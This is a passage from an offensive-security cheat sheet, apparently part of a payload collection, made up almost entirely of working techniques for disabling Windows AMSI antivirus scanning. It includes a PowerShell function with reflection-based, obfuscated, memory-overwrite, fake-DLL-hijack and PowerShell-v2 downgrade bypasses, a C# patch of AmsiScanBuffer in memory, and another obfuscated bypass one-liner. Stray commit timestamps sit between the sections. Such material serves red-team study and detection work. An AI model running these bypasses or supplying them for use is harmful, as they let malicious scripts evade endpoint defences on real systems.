2 0 0 0 73 139 206 255 211 255 5 156 30 0 0 184 1 0 0 0 72 139 92 36 48 72 139 116 36 56 72 139 124 36 72 72 131 196 32 65 94 195 204 72 137 92 36 8 72 137 116 36 24 87 72 131 236 32 64 138 241 139 5 104 30 0 0 51 219 133 192 127 4 51 192 235 80 255 200 137 5 86 30 0 0 232 109 3 0 0 64 138 248 136 68 36 56 131 61 1
if (([IntPtr]::Size) -eq 8)
{
Write-Verbose "64 bit process detected."
$DllBytes = $AmsiX64
}
elseif (([IntPtr]::Size) -eq 4)
{
Write-Verbose "32 bit process detected."
$DllBytes = $AmsiX86
}
switch($method)
{
"unload"
{
Write-Verbose "Using Matt Graeber's Reflection method."
if ($ShowOnly -eq $True)
{
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output '[Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)'
}
else
{
Write-Output "Executing the bypass."
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
}
}
"unloadsilent"
{
Write-Verbose "Using Matt Graeber's Reflection method with WMF5 autologging bypass."
if ($ShowOnly -eq $True)
{
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output '[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags'')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType(''System.T''+''ype'')), [Object]([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'')),(''GetFie''+''ld'')).Invoke(''amsiInitFailed'',((''Non''+''Public,Static'') -as [String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags''))).SetValue($null,$True)'
}
else
{
Write-Output "Executing the bypass."
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
}
}
"unloadobfuscated"
{
Write-Verbose "Using Matt Graeber's Reflection method with obfuscation from Daneil Bohannon's Invoke-Obfuscation - which bypasses WMF5 autologging."
if ($ShowOnly -eq $True)
{
$code = @"
Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)])
"@
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output $code
}
else
{
Write-Output "Executing the bypass."
Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)])
}
}
"unload2"
{
Write-Verbose "Using Matt Graeber's second Reflection method."
if ($ShowOnly -eq $True)
{
Write-Output "Use the following scriptblock before you run a script which gets detected."
Write-Output '[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiContext'',[Reflection.BindingFlags]''NonPublic,Static'').GetValue($null),0x41414141)'
}
else
{
Write-Output "Executing the bypass."
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)
}
}
"dllhijack"
{
Write-Verbose "Using Cornelis de Plaa's DLL hijack method."
if ($ShowOnly -eq $True)
{
Write-Output "Copy powershell.exe from C:\Windows\System32\WindowsPowershell\v1.0 to a local folder and dropa fake amsi.dll in the same directory."
Write-Output "Run the new powershell.exe and AMSI should be gone for that session."
}
else
{
[Byte[]] $temp = $DllBytes -split ' '
Write-Output "Executing the bypass."
Write-Verbose "Dropping the fake amsi.dll to disk."
[System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp)
Write-Verbose "Copying powershell.exe to the current working directory."
Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd
Write-Verbose "Starting powershell.exe from the current working directory."
& "$pwd\powershell.exe"
}
}
"psv2"
{
Write-Verbose "Using PowerShell version 2 which doesn't support AMSI."
if ($ShowOnly -eq $True)
{
Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process."
}
else
{
Write-Verbose "Checking if .Net version 2.0.50727 is installed."
$versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version
if($versions -match "2.0.50727")
{
Write-Verbose ".Net version 2.0.50727 found."
Write-Output "Executing the bypass."
powershell.exe -version 2
}
else
{
Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2."
}
}
}
"obfuscation"
{
Write-Output "AMSI and the AVs which support it can be bypassed using obfuscation techqniues."
Write-Output "ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) and Invoke-Obfuscation can be used (https://github.com/danielbohannon/Invoke-Obfuscation)."
}
}
}
```
## Adam Chester Patch
Bypass Update by Adam Chester https://twitter.com/_xpn_/status/1170852932650262530
```ps1
$Winpatch = @"
using System;
using System.Runtime.InteropServices;
public class patch
{
// https://twitter.com/_xpn_/status/1170852932650262530
static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
public static void it()
{
if (is64Bit())
PatchAmsi(x64);
else
PatchAmsi(x86);
}
private static void PatchAmsi(byte[] patch)
{
try
{
var lib = Win32.LoadLibrary("a" + "ms" + "i.dll");
var addr = Win32.GetProcAddress(lib, "AmsiScanBuffer");
uint oldProtect;
Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
Marshal.Copy(patch, 0, addr, patch.Length);
Console.WriteLine("Patch Sucessfull");
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool is64Bit()
{
bool is64Bit = true;
if (IntPtr.Size == 4)
is64Bit = false;
return is64Bit;
}
}
class Win32
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type -TypeDefinition $Winpatch -Language CSharp
[patch]::it()
```
2022-11-07 09:10:21 +00:00
## Other interesting AMSI bypass
* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1)
```ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " " ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true)
```
2021-03-24 21:26:23 +00:00
## AMSI.fail
> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/
2020-12-08 13:31:01 +00:00
## References
* [S3cur3Th1sSh1t - Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/blob/master/README.md)